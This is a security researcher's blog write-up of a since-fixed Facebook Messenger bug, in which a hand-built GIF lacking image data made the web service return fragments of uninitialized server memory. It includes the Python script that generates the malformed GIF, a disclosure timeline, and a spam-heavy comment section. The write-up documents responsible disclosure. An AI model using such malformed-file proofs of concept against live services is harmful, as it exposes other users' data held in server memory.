Facebook Messenger server random memory exposure through corrupted GIF image

Intro

Year ago, in February 2018, I was testing Facebook Messenger for Android looking how it works with corrupted GIF images. I was inspired by Imagemagick "uninitialized memory disclosure in gif coder" bug and PoC called "gifoeb" (cool name for russian speakers). I found Messenger app only crashes with images generated by "gifoeb" tool with Nullpointer dereferrence (Facebook did't awarded bounty for DoS in Facebook Messenger for Android).
Ok. I thought: what is GIF image format and how it looks, how I can generate my own image?
(spoiler: 10K$ bug in Facebook Messenger for Web, but theory first)

Basic GIF image

I found clear description of GIF image format, the main header should look like this:


Offset   Length   Contents
  0      3 bytes  "GIF"
  3      3 bytes  "87a" or "89a"
  6      2 bytes  <Logical Screen Width>
  8      2 bytes  <Logical Screen Height>
 10      1 byte   bit 0:    Global Color Table Flag (GCTF)
                  bit 1..3: Color Resolution
                  bit 4:    Sort Flag to Global Color Table
                  bit 5..7: Size of Global Color Table: 2^(1+n)
 11      1 byte   <Background Color Index>
 12      1 byte   <Pixel Aspect Ratio>
 13      ? bytes  <Global Color Table(0..255 x 3 bytes) if GCTF is one>
         ? bytes  <Blocks>
         1 bytes  <Trailer> (0x3b)

(Full good description here: http://www.onicos.com/staff/iz/formats/gif.html#header)
I decided to create the basic GIF file with the minimal required fields.

Making own GIF

To create own GIF I've taken python to help me generate binary file


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
import struct

screenWidth = 640
screenHeight = 480

f = open('test.gif', 'wb')

# Offset   Length   Contents
#   0      3 bytes  "GIF"
#   3      3 bytes  "87a" or "89a"
f.write(b"GIF89a")

#   6      2 bytes  <Logical Screen Width>
f.write(struct.pack('<h', screenWidth))

#   8      2 bytes  <Logical Screen Height>
f.write(struct.pack('<h', screenHeight))

#  10      1 byte   bit 0:    Global Color Table Flag (GCTF)
#                   bit 1..3: Color Resolution
#                   bit 4:    Sort Flag to Global Color Table
#                   bit 5..7: Size of Global Color Table: 2^(1+n)
bits = int('00000010', 2)
f.write(struct.pack('<b', bits))

#  11      1 byte   <Background Color Index>
f.write(struct.pack('<b', 0))

#  12      1 byte   <Pixel Aspect Ratio>
f.write(struct.pack('<b', 1))

#  13      ? bytes  <Global Color Table(0..255 x 3 bytes) if GCTF is one>

#          ? bytes  <Blocks>


# Offset   Length   Contents
#   0      1 byte   Image Separator (0x2c)
f.write(struct.pack('<b', 0x2c))

#   1      2 bytes  Image Left Position
f.write(struct.pack('<h', 0))

#   3      2 bytes  Image Top Position
f.write(struct.pack('<h', 0))

#   5      2 bytes  Image Width
f.write(struct.pack('<h', screenWidth))

#   7      2 bytes  Image Height
f.write(struct.pack('<h', screenHeight))

#   8      1 byte   bit 0:    Local Color Table Flag (LCTF)
#                   bit 1:    Interlace Flag
#                   bit 2:    Sort Flag
#                   bit 2..3: Reserved
#                   bit 4..7: Size of Local Color Table: 2^(1+n)
#          ? bytes  Local Color Table(0..255 x 3 bytes) if LCTF is one
f.write(struct.pack('<b', int('00000100', 2)))

#          1 byte   LZW Minimum Code Size
#f.write(struct.pack('<b', 1))

# [ // Blocks
#          1 byte   Block Size (s)
#f.write(struct.pack('<b', 1))

#         (s)bytes  Image Data
# ]*
#          1 byte   Block Terminator(0x00)
#f.write(struct.pack('<b', 0))


#          1 bytes  <Trailer> (0x3b)



f.write(struct.pack('<b', 0x3b))

f.close()

This script generates exactly the same image as we need. I left comments to see which headers we ignore in image, you can see that our GIF does't have image data blocks - it is empty, after color table flags goes trailer.

Facebook Messenger 

I started to test Facebook Messenger for Android with my generated GIFs (I had variations with different sizes, header fields), but nothing happened... Until I opened Messenger web page on my laptop and saw this weird image:
It was very small, increased size
Wait, but our GIF does't have any content, what image I have back from Facebook?
I had changed GIF size and saw this white noise image, hm, looks also weird:

No TV signal

Really strange. I've uploaded the same binary again and saw:

Embedded TV screen in Messenger
Image a bit changed. But I uploaded the same GIF in both cases.
After playing with GIF screen/image sizes:


Full screen picture
This reminds me situation when you tried to read image from file and used width instead of height.
Finally I caught this output:
Semi stable TV signal in Messenger caught
And I realized that I'm getting some previous buffer for GIF image, because my image does't have content body.

Timeline

26 FEB 2018: report sent to Facebook Team
01 MAR 2018: triaged
09 MAR 2018: fixed
21 MAR 2018: 10k$

Comments

  1. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. Thank you for excellent article.You made an article that is interesting.
      Tavera car for rent in chennai|Indica car for rent in chennai|innova car for rent in chennai|mini bus for rent in chennai|tempo traveller for rent in chennai
      Keep on the good work and write more article like this...

      Great work !!!!Congratulations for this blog


      Delete
  2. This comment has been removed by the author.

    ReplyDelete
  3. Replies
    1. If you could read arbitrary memory that contains secrets, that'd be a bad vulnerability.

      Delete
  4. This comment has been removed by the author.

    ReplyDelete
  5. Hey, guys Today we are going to give you one of the best Mini Militia Mod Apk which is Mini Militia Mod Apk Unlimited Ammo and Nitro this feature is the most famous in mini militia mod download and many people love to use this in their game.

    Experience extraordinary multiplayer fight with up to 6 players on the web or 12 using neighborhood wi-fi. Train with the Sarge and sharpen your aptitudes in disengaged Training, Co-activity and Survival modes. Shoot a colossal number of weapon types including the master marksman, shotgun and flamethrower only in Mini Militia Mod Apk Unlimited Ammo and Nitro.

    ReplyDelete
  6. How you report bug facebook in whitehat progam?

    ReplyDelete
  7. Hi, great job.
    As you are a researcher if you don't mind can i ask you a question?

    I hv found a sensitive bug in WhatsApp on Feb 2015, which was allowing me to reopen a whatsapp account without OTP varification, at that time I was unaware of FB bounty program, so i informed to WhatsApp CONTACT US directly through email(i still hv the copy of emails). I explained them how to reproduced the bug in detail, i did got a reply that "there is no bug" , but after a month WhatsApp give a global update and remove that bug which I found, and i was like lol.

    ReplyDelete
  8. Ahrefs Accounts For Free with Username and Password 2019 is one of the best SEO tools available in the market his tools help you to make your website more amazing and shows some amazing analytics and with Ahrefs free, you can make backlinks and many other important things.

    ReplyDelete

  9. A metaobject convention assignmenthelper.com.au
    gives the vocabulary to get to and control the structure and conduct of items. Run of the mill elements of a metaobject protoco. In software engineering, a metaobject is a question that controls, makes, portrays, or actualizes different items including itself. The protest that the metaobject is about is known as the base question.

    ReplyDelete
  10. This is really a big and great source of information. We can all contribute and benefit from reading as well as gaining knowledge from this content. Just amazing
    experience. Thanks for sharing such nice information.
    Event Management in Pondicherry | Wedding Decorators in Trichy | Wedding Photographers in Trichy | Wedding Planner in Pondicherry | Wedding Decorators in Pondicherry | Candid Photography Pondicherry | Wedding Photographers in Pondicherry

    ReplyDelete
  11. This comment has been removed by the author.

    ReplyDelete
  12. Thanks for Sharing this Great information worth reading this article. Leverage SharePoint Features from veelead solutions

    ReplyDelete
  13. While composing the last paper of your last B.Com test, a plenty of considerations experience your psyche. A great deal of these contemplations incorporate plans about resting for a whole week or celebrating for a whole week, contingent upon your individual inclinations. Be that as it may, trust us, none of that is really going to happen in light of the fact that when you complete your tests your folks, relatives, neighbours, and even your Facebook companions will begin getting some information about your feasible arrangements. What's more, don't mistake them for your gathering or dozing plans since they are alluding to your vocation Career after B com plans. In the present focused world, you are offered with many profession improving courses. On the off chance that you are not happy with the profession or course you decided for yourself at that point there are some present moment yet high worth – low speculation courses accessible in the market.

    ReplyDelete
  14. Me2call4u is free Video chat, video call app is ideal for one-to-one conversations that you can meet and match fun and interesting single all over the world in seconds.

    ReplyDelete
  15. Interesting and you have very nice way of expressing the article. The author clearly describe all the parts of the article with good language and information. Looking forward to another article. Video calling app

    ReplyDelete
  16. This is an awesome post.Really very informative and creative contents.
    SEO company in Chennai

    ReplyDelete
  17. good article about data science has given it is very nice thank you for sharing.
    Data Science Training in Hyderabad

    ReplyDelete
  18. thank you for the valuable information giving on data science it is very helpful.
    Data Science Training in Hyderabad

    ReplyDelete
  19. Dating apps free "CrazyKrush" highlights your personality and interests with rich dating profiles that let us know what you care about most. We ask you questions on your deal breakers and passions so you can match on what matters.

    ReplyDelete
  20. Share wonderful details concerning your blog, Blog truly useful for us. College Essay Writing Service

    ReplyDelete
  21. Finding the perfect dream partner without delay is not a big deal anymore as Crazy krush dating apps free allows users to chat and meet

    ReplyDelete

Post a Comment

Popular posts from this blog

Homograph attack on domains with K